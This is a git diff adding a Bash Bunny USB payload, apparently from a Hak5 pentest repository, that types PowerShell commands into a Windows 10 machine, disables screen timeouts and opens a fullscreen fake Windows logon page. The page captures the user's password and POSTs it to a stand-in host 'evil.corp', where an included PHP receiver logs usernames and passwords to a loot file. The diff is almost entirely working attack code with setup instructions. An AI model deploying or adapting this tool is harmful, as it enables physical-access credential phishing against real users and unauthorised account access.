Merge branch 'hak5:master' into master
|
@ -0,0 +1,66 @@
|
||||||
|
# "Microsoft Windows 10" Fake Logon Screen
|
||||||
|
|
||||||
|
- Title: "Microsoft Windows 10" Fake Logon Screen
|
||||||
|
- Author: TW-D
|
||||||
|
- Version: 1.0
|
||||||
|
- Target: Microsoft Windows 10
|
||||||
|
- Category: Phishing
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
3) Retrieve the current username.
|
||||||
|
4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||||
|
5) The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||||
|
6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
From "payload.txt" change the values of the following constants :
|
||||||
|
```bash
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly BB_LABEL="BashBunny"
|
||||||
|
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
|
||||||
|
readonly INPUT_PLACEHOLDER="Password"
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Example of code for the data receiver :
|
||||||
|
```php
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if (
|
||||||
|
$_SERVER['REQUEST_METHOD'] === 'POST' &&
|
||||||
|
isset($_POST['username']) && !empty($_POST['username']) &&
|
||||||
|
isset($_POST['password']) && !empty($_POST['password'])
|
||||||
|
) {
|
||||||
|
|
||||||
|
$remote_addr = (string) $_SERVER['REMOTE_ADDR'];
|
||||||
|
$user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
|
||||||
|
$username = (string) $_POST['username'];
|
||||||
|
$password = (string) $_POST['password'];
|
||||||
|
|
||||||
|
/*
|
||||||
|
touch ./aGFrNQ_loot.log
|
||||||
|
chown www-data:www-data ./aGFrNQ_loot.log
|
||||||
|
*/
|
||||||
|
$loot = fopen('aGFrNQ_loot.log', 'a');
|
||||||
|
fwrite($loot, "##\n");
|
||||||
|
fwrite($loot, $remote_addr . "\n");
|
||||||
|
fwrite($loot, $user_agent . "\n");
|
||||||
|
fwrite($loot, $username . ':' . $password . "\n");
|
||||||
|
fwrite($loot, "##\n");
|
||||||
|
fclose($loot);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
http_response_code(302);
|
||||||
|
header('Location: https://hak5.org/');
|
||||||
|
exit;
|
||||||
|
|
||||||
|
?>
|
||||||
|
```
|
|
@ -0,0 +1,121 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: "Microsoft Windows 10" Fake Logon Screen
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# 1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
# 2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
# 3) Retrieve the current username.
|
||||||
|
# 4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||||
|
# 5) The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||||
|
# 6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
|
||||||
|
#
|
||||||
|
# Author: TW-D
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Phishing
|
||||||
|
# Target: Microsoft Windows 10
|
||||||
|
# Attackmodes: HID and STORAGE
|
||||||
|
#
|
||||||
|
# TESTED ON
|
||||||
|
# ===============
|
||||||
|
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||||
|
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||||
|
#
|
||||||
|
# NOTE
|
||||||
|
# ===============
|
||||||
|
# Target computer with a single screen.
|
||||||
|
#
|
||||||
|
# STATUS
|
||||||
|
# ===============
|
||||||
|
# Magenta solid ................................... SETUP
|
||||||
|
# Yellow single blink ............................. ATTACK
|
||||||
|
# Yellow double blink ............................. STAGE2
|
||||||
|
# Yellow triple blink ............................. STAGE3
|
||||||
|
# Yellow quadruple blink .......................... STAGE4
|
||||||
|
# White fast blink ................................ CLEANUP
|
||||||
|
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||||
|
#
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly BB_LABEL="BashBunny"
|
||||||
|
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
|
||||||
|
readonly INPUT_PLACEHOLDER="Password"
|
||||||
|
|
||||||
|
######## SETUP ########
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
|
||||||
|
######## ATTACK ########
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
Q DELAY 8000
|
||||||
|
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||||
|
Q DELAY 8000
|
||||||
|
|
||||||
|
LED STAGE2
|
||||||
|
|
||||||
|
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 3500
|
||||||
|
Q STRING "CD \"\${BB_VOLUME}\""
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
LED STAGE3
|
||||||
|
|
||||||
|
# Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
#
|
||||||
|
Q STRING "(powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
# Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
#
|
||||||
|
Q STRING "(powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
# Retrieve the current username.
|
||||||
|
#
|
||||||
|
Q STRING "\"const CURRENT_USERNAME = '\$([Environment]::UserName)';\" | Out-File -FilePath ./TMP.js"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "\"const DROP_URL = '${DROP_URL}';\" | Out-File -FilePath ./TMP.js -Append"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "\"const INPUT_PLACEHOLDER = '${INPUT_PLACEHOLDER}';\" | Out-File -FilePath ./TMP.js -Append"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
LED STAGE4
|
||||||
|
|
||||||
|
# Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||||
|
#
|
||||||
|
Q STRING "(Invoke-Expression .\\phishing_files\\index.html); exit"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 9000
|
||||||
|
Q TAB
|
||||||
|
Q DELAY 2000
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 2000
|
||||||
|
|
||||||
|
######## CLEANUP ########
|
||||||
|
|
||||||
|
LED CLEANUP
|
||||||
|
|
||||||
|
sync
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
|
|
||||||
|
# The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||||
|
#
|
||||||
|
shutdown -h 0
|
|
@ -0,0 +1,16 @@
|
||||||
|
body {
|
||||||
|
min-height: 100vh;
|
||||||
|
background-size: cover;
|
||||||
|
background-repeat: no-repeat;
|
||||||
|
background-position-x: center;
|
||||||
|
background-position-y: center;
|
||||||
|
}
|
||||||
|
|
||||||
|
.login {
|
||||||
|
min-width: 42px;
|
||||||
|
background-image: url("./../img/submit.png");
|
||||||
|
background-size: cover;
|
||||||
|
background-repeat: no-repeat;
|
||||||
|
background-position-x: center;
|
||||||
|
background-position-y: center;
|
||||||
|
}
|
|
@ -0,0 +1,13 @@
|
||||||
|
@font-face {
|
||||||
|
font-family: "text-security-disc";
|
||||||
|
src: url("./../font/text-security-disc.ttf") format("truetype");
|
||||||
|
}
|
||||||
|
|
||||||
|
body, .password::placeholder {
|
||||||
|
font-family: "Segoe UI";
|
||||||
|
font-weight: lighter;
|
||||||
|
}
|
||||||
|
|
||||||
|
.password {
|
||||||
|
font-family: "text-security-disc";
|
||||||
|
}
|
After Width: | Height: | Size: 624 B |
After Width: | Height: | Size: 1.0 KiB |
After Width: | Height: | Size: 2.5 KiB |
After Width: | Height: | Size: 1.4 KiB |
After Width: | Height: | Size: 9.0 KiB |
After Width: | Height: | Size: 980 KiB |
After Width: | Height: | Size: 1.5 MiB |
After Width: | Height: | Size: 3.2 MiB |
After Width: | Height: | Size: 1.4 MiB |
After Width: | Height: | Size: 36 KiB |
After Width: | Height: | Size: 808 KiB |
|
@ -0,0 +1,4 @@
|
||||||
|
document.querySelector('div#username').innerText = CURRENT_USERNAME;
|
||||||
|
document.querySelector('#drop').action = DROP_URL;
|
||||||
|
document.querySelector('input#username').value = CURRENT_USERNAME;
|
||||||
|
document.querySelector('.password').placeholder = INPUT_PLACEHOLDER;
|
|
@ -0,0 +1,9 @@
|
||||||
|
function fullscreen() {
|
||||||
|
let document_element;
|
||||||
|
document_element = document.documentElement;
|
||||||
|
document.querySelector('#fullscreen').style.display = "none";
|
||||||
|
if (document_element.requestFullscreen) {
|
||||||
|
document_element.requestFullscreen();
|
||||||
|
document.querySelector('.password').focus();
|
||||||
|
}
|
||||||
|
}
|
|
@ -0,0 +1,9 @@
|
||||||
|
const WALLPAPERS = [
|
||||||
|
'abstact-nature.jpg',
|
||||||
|
'beach-cave.jpg',
|
||||||
|
'mountains-lake.png',
|
||||||
|
'sea-airplain.png',
|
||||||
|
'solid-blue.jpg',
|
||||||
|
'windows-light.jpg'
|
||||||
|
];
|
||||||
|
document.querySelector('body').style.backgroundImage = ('url("./assets/img/wallpapers/' + (WALLPAPERS.sort(() => Math.random() - 0.5)[0]) + '")');
|
|
@ -0,0 +1,7 @@
|
||||||
|
window.addEventListener(
|
||||||
|
'contextmenu',
|
||||||
|
function(e) {
|
||||||
|
e.preventDefault();
|
||||||
|
},
|
||||||
|
false
|
||||||
|
);
|
|
@ -0,0 +1,47 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8" />
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1" />
|
||||||
|
<link rel="stylesheet" type="text/css" href="./assets/css/backgrounds.css?v=1.0.0" />
|
||||||
|
<link rel="stylesheet" type="text/css" href="./assets/css/fonts.css?v=1.0.0" />
|
||||||
|
<link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?v=5.1.3" />
|
||||||
|
<title></title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<main class="container-fluid">
|
||||||
|
<section class="row">
|
||||||
|
<div class="col-3" style="min-height: 100vh;">
|
||||||
|
<button id="fullscreen" onclick="fullscreen();">fullscreen</button>
|
||||||
|
</div>
|
||||||
|
<div class="col-6 align-self-center text-center">
|
||||||
|
<img class="img-fluid opacity-75" src="./assets/img/user.png" title="" />
|
||||||
|
<div class="h2 my-3 text-white" id="username">User</div>
|
||||||
|
<div class="row">
|
||||||
|
<div class="col-6 offset-3">
|
||||||
|
<form method="POST" id="drop">
|
||||||
|
<div class="input-group">
|
||||||
|
<input class="d-none" id="username" type="text" name="username" />
|
||||||
|
<input class="form-control password" type="text" name="password" autocomplete="off" placeholder="Password" required />
|
||||||
|
<button class="btn opacity-75 login" type="submit"></button>
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="col-3" style="min-height: 100vh;">
|
||||||
|
<div class="position-absolute bottom-0 end-0">
|
||||||
|
<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/worldwide.png" title="" />
|
||||||
|
<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/network.png" title="" />
|
||||||
|
<img class="img-fluid ms-2 me-3 my-3" style="width: 45px;" src="./assets/img/icons/power.png" title="" />
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</main>
|
||||||
|
<script type="text/javascript" src="./../TMP.js"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/fullscreen.js?v=1.0.0"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/rightclick.js?v=1.0.0"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/randomwall.js?v=1.0.0"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/dispatch.js?v=1.0.0"></script>
|
||||||
|
</body>
|
||||||
|
</html>
|
|
@ -6,7 +6,7 @@
|
||||||
# Target: Windows 7
|
# Target: Windows 7
|
||||||
# Attackmodes: HID
|
# Attackmodes: HID
|
||||||
|
|
||||||
ATTACMODE HID
|
ATTACKMODE HID
|
||||||
|
|
||||||
###### OPTIONS #######
|
###### OPTIONS #######
|
||||||
|
|
||||||
|
|